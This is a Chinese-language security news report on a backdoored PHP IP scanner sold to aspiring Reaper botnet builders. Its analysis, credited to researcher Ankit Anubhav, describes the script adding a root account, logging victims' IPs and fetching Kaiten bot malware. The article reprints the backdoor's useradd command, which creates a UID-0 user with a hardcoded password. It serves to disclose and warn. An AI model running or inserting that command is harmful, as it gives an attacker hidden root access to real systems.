借Reaper僵尸网络推广免费IP扫描器 然后在IP扫描器里面放个后门

在过去数周内,那些希望创建自己的Reaper僵尸网络的黑客们,在下载IP扫描器的过程中都有“意外收获”。

IP扫描器是一个PHP文件。数周前,在关于Reaper新闻报道出来前,该PHP文件可免费下载。Reaper是由漏洞路由器和IoT设备组成的僵尸网络。

Reaper的不同之处在于,创建者利用IP扫描器寻找漏洞系统,然后利用漏洞利用程序去发现各种漏洞,在漏洞设备上安装Reaper恶意软件。这与近期很多僵尸网络(如Mirai和Hijime)不同,它们利用Telnet和SSH暴力字典对不安全设备发起攻击。

黑客搭车Reaper僵尸网络事件 传播自己的IP扫描器

聪明的诈骗分子很快意识到,随着这个新型僵尸网络的兴起,想要成为黑客的人和脚本小子们很快就会开始寻找各种构建类似僵尸网络的工具。

因此,该攻击者(我们不想本文中提及名字)创建了一个网站。他在该网站上推广一个PHP脚本,可从本地名为poop.txt的文本文档中读取IP地址,并检查IP是否是托管在GoAhead web服务器上,然后在GoAhead-Filtered.txt文件中列出正面结果。

黑客们对该脚本很有兴趣,因为可用于识别GoAhead服务器设备,通常是IP安全摄像头。这些设备上通常存在公共漏洞利用程序,也是Reaper僵尸网络的攻击目标。

随机字符墙后的多数PHP脚本都进行了模糊处理。对此,技术知识欠缺和未留意到PHP脚本源代码的脚本小子们并不感到奇怪。青天科技(NewSky Security)发现了这一点,其首席研究人员Ankit Anubhav表示:

“这种情况下,脚本通过ROT13和base64进行多次加密,并且数据也是压缩的。”

谁曾想 IP扫描器脚本有后门 黑客秒变肉鸡

进行代码反编译后,Anubhav表示,该脚本包含很明显的后门,有经验的程序员都可以预见到大量模糊化的源代码。

这些代码包含四部分。第一部分是功能完备的IP扫描器 。第二部分运营Bash命令,在Linux服务器上添加新用户,受害者可在该服务器上执行IP扫描器脚本。第三部分是在远程服务器上登录受害者IP地址。第四部分是在执行IP扫描器的服务器上下载和执行Kaiten僵尸网络恶意软件。

一般而言,那些寻求创建自己的类似Reaper僵尸网络的“黑客小子”们,最后都沦为他人Kaiten僵尸网络的组成部分。

并且,通过使用已登录的IP地址和后门账户(用户名VM,密码Meme123),提供该脚本的攻击者还能够登录受感染的服务器.

useradd -o -u 0 -g 0 -M -d /root -s /bin/bash VM; echo -e "Meme123\nMeme123" | passwd VM;

在接受媒体采访中,Anubhav还指出,攻击者可利用该后门收集包含其他人扫描结果的GoAhead-Filtered.txt文件,并在其他僵尸网络攻击者为了做好其他一切准备后,利用这些IP地址劫持GoAhead摄像头。

其它黑客发现后门 在Twitter喊话那个“作死者”

整个过程并不复杂,Anubhav并不是唯一发现后门的人 。其他黑客也发现了后门,并在Twitter上喊话创建者。

通过深入挖掘后门创建者所用的一些ID,我们还发现:这不是他第一次发布后门恶意软件,也不是第一次与其他黑客在线争吵 。这也许就是Anubhav能够发现黑客名义的dox文件的原因。

本文写作之时,兜售PHP脚本的网站已被叫停,但Anubhav告诉媒体称:

电脑黑客还会继续在地下黑客论坛上出售其他脚本,并会为想要建立IoT僵尸网络的人提供支持。

这也不是黑客地下市场提供的第一个后门恶意软件 。今年9月份,Zscaler发现了一个隐藏在Cobian RAT恶意软件中的后门。当时,该后门在各种地下黑客论坛上出售。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

看看印尼黑客如何利用电影大片进行网络攻击

网络犯罪分子每天都在想尽各种办法来进行攻击,这对于信息安全从业者来说再正常不过了,而这一次印尼网络犯罪组织开始利用电影大片来欺骗目标用户访问已受感染的网站。

930
来自专栏FreeBuf

对一次网络钓鱼攻击的逆向分析

作为最近的一项研究,我们首先发现了两个钓鱼攻击域名,而在这两个域名之后是更多的域名,这些域名已经成功地攻击了超过1000多名用户,这项钓鱼攻击主要针对的是AOL...

1845
来自专栏大数据文摘

国内影响已扩散,Wannacry蠕虫勒索软件及修复方案

1402
来自专栏安恒信息

大量Windows 0-day漏洞泄漏,安恒信息提供免费在线检测

北京时间 2017 年 4 月 14 日晚,黑客团体Shadow Brokers(影子经纪人)再次泄露了一份 117.9 MB 的 NSA 机密文档,内含 23...

2045
来自专栏安恒信息

新一轮DNS钓鱼攻击已突破国内安全防线

近日,据国内领先的DNS服务提供商114DNS官网微博消息称:新一轮DNS钓鱼攻击已经突破国内安全防线,可能已经导致数百万用户感染。随后,其他安...

2826
来自专栏云基础安全

3分钟了解网站入侵及防护问题

技术参考:<OWASP TOP 10 2017> 开源Web应用安全项目十项最严重的Web程序安全问题:

2686
来自专栏区块链

什么是安全漏洞,黑客如何利用它攻击你?

你应该很清楚,软件中的安全漏洞或漏洞可能会导致你的计算机或网络遭到黑客攻击——换句话说,恶意的第三方将控制你的系统,安装恶意软件会窃取你的信息。 但是黑客究竟是...

2446
来自专栏华章科技

国内影响已扩散,Wannacry蠕虫勒索软件袭击全球(含修复方案)

一旦电脑感染了Wannacry病毒,受害者要高达300美元比特币的勒索金才可解锁。否则,电脑就无法使用,且文件会被一直封锁。

511
来自专栏FreeBuf

RubyMiner挖矿程序24小时内影响全球30%的网络

近日,Check Point 的安全研究人员发现了 RubyMiner 恶意软件家族,针对全球的 web 服务器发起攻击,并试图利用这些服务器挖掘门罗币。24 ...

1948
来自专栏腾讯云安全的专栏

Apache Struts2漏洞又来, 腾讯云WAF一键防御

1768

扫码关注云+社区